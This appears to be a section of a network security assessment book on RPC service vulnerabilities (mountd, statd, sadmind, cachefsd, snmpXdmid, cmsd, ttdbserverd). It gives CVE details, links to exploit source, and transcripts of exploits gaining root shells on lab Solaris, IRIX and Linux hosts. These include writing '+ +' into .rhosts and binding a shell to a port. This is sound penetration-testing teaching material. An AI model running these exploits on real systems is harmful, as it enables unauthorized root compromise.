12.2 RPC Service Vulnerabilities

Due to the number of different RPC services, associated prognum values, CVE references, and vulnerable platforms, it is difficult to simply group bugs and talk about them individually (as I do elsewhere in this book). I have put together the following matrix of popular services and vulnerable platforms, shown in Table 12-1. A small number of obscure IRIX services (rpc.xfsmd, rpc.espd, etc.) aren't listed; they can be investigated through MITRE CVE and other sources.

What follows are details of many of these serious remotely exploitable bugs, along with exploit script information and demonstrations. Some bugs listed in Table 12-1 aren't discussed here because no public exploit information exists at this time.

12.2.1 Abusing rpc.mountd (100005)

Two serious remotely exploitable bugs have been identified in the mountd service that's bundled with many Linux distributions. The MITRE CVE references for these two bugs are CVE-1999-0002 and CVE-2003-0252.

12.2.1.1 CVE-1999-0002

In October 1998, a serious remotely exploitable vulnerability was found in the NFS mountd service bundled with Red Hat Linux 5.1 (as part of the nfs-server-2.2beta29 package). Other Linux distributions were also found to be vulnerable, along with IRIX. Exploit scripts for this issue are available at:

http://examples.oreilly.com/networksa/tools/ADMmountd.tgz

http://examples.oreilly.com/networksa/tools/rpc.mountd.c

12.2.1.2 CVE-2003-0252

In July 2003, an off-by-one bug was identified in the xlog( ) function of the mountd service bundled with multiple Linux distributions (including Debian 8.0, Slackware 8.1, and Red Hat Linux 6.2) as part of the nfs-utils-1.0.3 package. An exploit script for this issue is available at http://www.newroot.de/projects/mounty.c.^[1]

^[1] URLs for tools in this book are mirrored at the O'Reilly site, http://examples.oreilly.com/networksa/tools.

12.2.1.3 Listing and accessing exported directories through mountd and NFS

If the mountd service is running, you can use the Unix showmount command to list exported directories on the target host. These directories can be accessed and manipulated by using the mount command, and other NFS client utilities. In Example 12-3, I use showmount to query a Solaris 2.6 host at 10.0.0.6 and by writing a .rhost file to a user's home directory, gain remote access privileges .

Example 12-3. Abusing writable NFS directories to gain direct host access

# showmount -e 10.0.0.6 Export list for 10.0.0.6: /home       (everyone) /usr/local  onyx.trustmatta.com /disk0      10.0.0.10,10.0.0.11 # mount 10.0.0.6:/home /mnt # cd /mnt # ls -la total 44 drwxr-x---  17 root      root    512 Jun 26 09:59 . drwxr-xr-x   9 root      root    512 Oct 12 03:25 .. drwx------   4 chris     users   512 Sep 20  2002 chris drwxr-x---   4 david     users   512 Mar 12  2003 david drwx------   3 chuck     users   512 Nov 20  2002 chuck drwx--x--x   8 jarvis    users  1024 Oct 31 13:15 jarvis # cd jarvis # echo + + > .rhosts # cd / # umount /mnt # rsh -l jarvis 10.0.0.6 csh -i Warning: no access to tty; thus no job control in this shell... dockmaster%

12.2.2 Multiple Vendor rpc.statd (100024) Vulnerabilities

Over recent years, four serious remotely exploitable bugs have been identified in the NFS status service (known as rpc.statd on most Unix-based platforms, and not to be confused with rpc.rstatd). These bugs are listed in Table 12-2.

Here I discuss these vulnerabilities and provide details of exploit scripts that can be used to compromise unpatched hosts.

12.2.2.1 CVE-1999-0018 and CVE-1999-0019

The original rpc.statd vulnerability outlined in April 1996 could only be used to write NFS status information to an arbitrary location on the target system, thus resulting in denial of service if system files were overwritten (such as /etc/passwd). A few months later, a variation to this attack was devised: by writing shellcode to the filename and performing a stack overflow (by providing an abnormally long filename), the shellcode could be executed.

Tom Perrine at the San Diego Supercomputer Center (SDSC) was the first to identify this new attack in the wild, with his post to BugTraq in September 1996 (archived at http://lists.insecure.org/lists/bugtraq/1996/Sep/0090.html). The exploit he spoke of was dropstatd, available for download as a precompiled Solaris binary at http://examples.oreilly.com/networksa/tools/dropstatd. Example 12-4 shows the exploit in use against a vulnerable Solaris 2.4 server at 10.0.0.4.

Example 12-4. Using dropstatd to compromise a Solaris 2.4 host

# ./dropstatd 10.0.0.4 rpc.statd is located on tcp port 32775 sent exploit code, now waiting for shell... # uname -a SunOS dublin 5.4 Generic_101945-32 sun4m sparc

A number of other operating systems were also vulnerable to this attack, but no exploit scripts have been made public to date.

12.2.2.2 CVE-1999-0493

To negate the risk of the rpc.statd overflow and other issues present in Solaris 2.4, many administrators simply upgraded to Solaris 2.5.1. In 1999, a new bug was found, known as the "rpc.statd / automountd relay vulnerability."

A local vulnerability in the automountd RPC service was uncovered, that allowed users to elevate their privileges through a malformed request. A second vulnerability, identified in rpc.statd, allowed RPC queries to be spoofed and bounced to other services. The combination of these two issues allowed for commands to be executed as root on the target host remotely.

John McDonald published an exploit for this vulnerability, available at http://packetstormsecurity.org/groups/horizon/statd.tar.gz.

12.2.2.3 CVE-2000-0666

Multiple Linux distributions (including Red Hat 6.2, Debian 2.3, and Mandrake 7.1) running rpc.statd are vulnerable to a format string bug, which results in remote root access being obtained through a stack overwrite within syslog( ). You can download a number of effective remote exploits for this bug from:

http://examples.oreilly.com/networksa/tools/lsx.tgz

http://examples.oreilly.com/networksa/tools/statdx2.tar.gz

http://examples.oreilly.com/networksa/tools/rpc-statd.c

12.2.3 Solaris rpc.sadmind (100232) Vulnerabilities

The Sun Solstice AdminSuite daemon (sadmind) is enabled by default on Solaris 2.5.1 and later (up to Solaris 9 at the time of writing). sadmind has been found to be remotely vulnerable to two serious issues over recent years; they are known within MITRE CVE as CVE-1999-0977 and CVE-2003-0722.

12.2.3.1 CVE-1999-0977

The sadmind service running on Solaris 2.6 and 2.7 can be exploited by issuing a crafted RPC request, resulting in a stack overflow. Two exploits are effective at compromising vulnerable Solaris instances on Intel (x86) and SPARC architectures and are available at:

http://examples.oreilly.com/networksa/tools/super-sadmind.c

http://examples.oreilly.com/networksa/tools/sadmind-brute.c

12.2.3.2 CVE-2003-0722

A more recent bug, identified in September 2003, relates to authentication within sadmind. By default, the sadmind service runs in a weak security mode known as AUTH_SYS. When running in this mode, sadmind accepts command requests containing the user and group IDs, as well as the originating system name. Because these values aren't validated by the sadmind service, you can gain access to a vulnerable system by sending a crafted RPC request. Due to the fact that this bug doesn't rely on memory manipulation, it can be exploited very easily, and circumvent proactive mechanisms that may be in use, such as stack protection.

H D Moore wrote a Perl exploit script called rootdown.pl, available at http://www.metasploit.com/tools/rootdown.pl.

Example 12-5 shows the rootdown.pl script in use against a Solaris 9 server at 10.0.0.9. As seen in Example 12-3, you can write + + into a user's .rhosts file (userbin in this case) to easily gain access.

Example 12-5. Exploiting a Solaris 9 host with rootdown.pl

# perl rootdown.pl -h 10.0.0.9 -i sadmind> echo + + > /usr/bin/.rhosts Success: your command has been executed successfully. sadmind> exit Exiting interactive mode... # rsh -l bin 10.0.0.9 csh -i Warning: no access to tty; thus no job control in this shell... onyx% uname -a SunOS onyx 5.9 Generic_112234-08 i86pc i386 i86pc

12.2.4 Solaris rpc.cachefsd (100235) Vulnerability

Solaris 2.6 and 2.7 hosts running the cachefsd RPC service are susceptible to a remotely exploitable heap overflow that results in direct system access. MITRE CVE lists the issue as CVE-2002-0033, and an exploit script written by LSD is available at http://lsd-pl.net/code/SOLARIS/solsparc_cachefsd.c.

You can use the LSD exploit to compromise Solaris systems running on SPARC architecture. Example 12-6 shows the LSD exploit in use against a Solaris 2.7 host at 10.0.0.7.

Example 12-6. Exploiting the cachefsd service remotely

# ./lsd_cachefsd  copyright LAST STAGE OF DELIRIUM jan 2002 poland  //lsd-pl.net/ cachefsd for solaris 2.6 2.7 sparc   usage: ./lsd_cachefsd address [-p port] [-o ofs] -v 6|7 [-b] [-m] # ./lsd_cachefsd 10.0.0.7 -v 7 copyright LAST STAGE OF DELIRIUM jan 2002 poland  //lsd-pl.net/ cachefsd for solaris 2.6 2.7 sparc   ret=0xffbefa1c adr=0xffbee998 ofs=0 timeout=10 ................OK! adr=0xffbee978 SunOS apollo 5.7 Generic_106541-08 sun4u sparc SUNW,Ultra-250 id uid=0(root) gid=0(root)

12.2.5 Solaris rpc.snmpXdmid (100249) Vulnerability

Solaris 2.7 and 8 hosts running the snmpXdmid RPC service are remotely vulnerable to a heap overflow that results in superuser access being granted on the host. The MITRE CVE reference for this bug is CVE-2001-0236, and LSD published an exploit for this vulnerability at http://lsd-pl.net/code/SOLARIS/solsparc_snmpxdmid.c.

Example 12-7 shows the LSD exploit in use against a Solaris 8 host at 10.0.0.8. If the RPC portmapper is unavailable (e.g., protected by a firewall), you can use the -p option to connect to the snmpXdmid service directly.

Example 12-7. Exploiting the snmpXdmid service under Solaris 8

# ./lsd_snmpxdmid copyright LAST STAGE OF DELIRIUM mar 2001 poland  //lsd-pl.net/ snmpXdmid for solaris 2.7 2.8 sparc usage: ./lsd_snmpxdmid address [-p port] -v 7|8 # ./lsd_snmpxdmid 10.0.0.8 -v 8  copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/  snmpXdmid for solaris 2.7 2.8 sparc     adr=0x000c8f68 timeout=30 port=928 connected! sent!  SunOS quantum 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250  id  uid=0(root) gid=0(root)

12.2.6 Multiple Vendor rpc.cmsd (100068) Vulnerabilities

The Common Desktop Environment (CDE) is a window management system found running on many commercial Unix systems. The Calendar Management Service Daemon is a component of CDE that runs as an RPC service (rpc.cmsd). Two serious remotely exploitable bugs have been identified in rpc.cmsd:

CVE-1999-0320

rpc.cmsd, which is found under Solaris 2.5.1 and prior (as part of CDE) and SunOS 4.1.4 and prior (as part of Openwindows) can be used to overwrite arbitrary files and gain root access remotely.

CVE-1999-0696

rpc.cmsd, which is found under Solaris 2.7, HP-UX 11.00, Tru64 4.0f, and UnixWare 7.1.0 and prior, is vulnerable to a remote overflow that results in arbitrary code being executed as root.

You can download exploits for Solaris 2.5 through 2.7 for both SPARC and Intel (x86) systems from http://lsd-pl.net/code/SOLARIS/solsparc_rpc.cmsd.c.

A UnixWare 7.1 exploit is also available http://downloads.securityfocus.com/vulnerabilities/exploits/rpc.cmsd-exploit.c.

Example 12-8 shows the usage of the compiled cmsd exploit (found in cmsd.tgz).

Example 12-8. cmsd exploit usage

# ./cmsd usage: cmsd [-s] [-h hostname] [-c command] [-u port] [-t port]        version host    -s: just start up rpc.cmsd (useful with a firewalled portmapper)    -h: (for 2.6) specifies the hostname of the target    -c: specifies an alternate command    -u: specifies a port for the udp portion of the attack    -t: specifies a port for the tcp portion of the attack Available versions:    1: Solaris 2.5.1 /usr/dt/bin/rpc.cmsd      338844 [2-5]    2: Solaris 2.5.1 /usr/openwin/bin/rpc.cmsd 200284 [2-4]    3: Solaris 2.5   /usr/openwin/bin/rpc.cmsd 271892 [2-4]    4: Solaris 2.6   /usr/dt/bin/rpc.cmsd      347712 [2-5]    5: Solaris 7     /usr/dt/bin/rpc.cmsd    6: Solaris 7     /usr/dt/bin/rpc.cmsd (2)    7: Solaris 7 (x86) .../dt/bin/rpc.cmsd     329080 [2-5]    8: Solaris 2.6_x86 .../dt/bin/rpc.cmsd     318008 [2-5]

For the exploit to work, you must build an RPC request that includes the local hostname (also known as the RPC cache name) of the target server. Under Solaris, there are a number of services that give away the hostname, including FTP, as shown here:

# ftp 10.0.0.6 Connected to 10.0.0.6. 220 dockmaster FTP server (SunOS 5.6) ready. Name (10.0.0.6:root):

After obtaining both the hostname and version of Solaris running on the target host, you can launch the cmsd exploit. If no command is specified, the tool binds /bin/sh to TCP port 1524, as shown in Example 12-9.

Example 12-9. Executing the rpc.cmsd overflow and gaining access

# ./cmsd -h dockmaster 4 10.0.0.6 rtable_create worked clnt_call[rtable_insert]: RPC: Unable to receive; errno = Connection reset by peer # telnet 10.0.0.6 1524 Trying 10.0.0.6... Connected to 10.0.0.6. Escape character is '^]'. id; uid=0(root) gid=0(root)

12.2.7 Multiple Vendor rpc.ttdbserverd (100083) Vulnerability

The ToolTalk Database (TTDB) service is an RPC component of the CDE window management system found running on multiple commercial Unix platforms, including Solaris, HP-UX, AIX, and IRIX.

In 1998, a format string bug was identified that, when exploited, causes a stack overwrite, resulting in arbitrary code being executed by an attacker. The MITRE CVE reference for this issue is CVE-2001-0717, and the following Unix platforms running CDE are affected:

• Solaris 2.6 and prior

• IRIX 6.5.2 and prior

• HP-UX 11.00 and prior

• AIX 4.3 and prior

The LSD security research team released exploit scripts for Solaris, AIX, and IRIX systems running rpc.ttdbserverd. Here I demonstrate only the Solaris and IRIX exploits. For a full breakdown of all exploits and tools published by LSD, visit their web site at http://lsd-pl.net.

12.2.7.1 Solaris rpc.ttdbserverd exploit

You can download the LSD TTDB exploit for Solaris from http://lsd-pl.net/code/SOLARIS/solsparc_rpc.ttdbserverd.c.

Example 12-10 shows the exploit in use against a Solaris 2.6 host at 10.0.0.6.

Example 12-10. The LSD Solaris rpc.ttdbserverd exploit in use

# ./lsd_solttdb copyright LAST STAGE OF DELIRIUM jul 1998 poland  //lsd-pl.net/ rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparc usage: ./lsd_solttdb address [-s|-c command] [-p port] [-v 6] # ./lsd_solttdb 10.0.0.6 -v 6 copyright LAST STAGE OF DELIRIUM jul 1998 poland  //lsd-pl.net/ rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparc adr=0xeffffaf8 timeout=10 port=32785 connected! sent! SunOS dockmaster 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-5_10 id uid=0(root) gid=0(root)

12.2.7.2 IRIX rpc.ttdbserverd exploit

You can use a second LSD exploit to compromise hosts running the TTDB server service on IRIX 6.5.2 and prior; it is available at http://www.lsd-pl.net/code/IRIX/irx_rpc.ttdbserverd.c.

Example 12-11 shows the exploit in use against an IRIX 6.2 host at 10.0.0.10.

Example 12-11. The LSD IRIX TTDB server exploit in action

# ./lsd_irixttdb 10.0.0.10 copyright LAST STAGE OF DELIRIUM jul 1998 poland  //lsd-pl.net/ rpc.ttdbserverd for irix 5.2 5.3 6.2 6.3 6.4 6.5 6.5.2 IP:17,19-22,25-28,30,32 adr=0x7fff4fec timeout=10 port=1710 connected! sent! IRIX mephisto 6.2 03131015 IP22 id uid=0(root) gid=0(sys)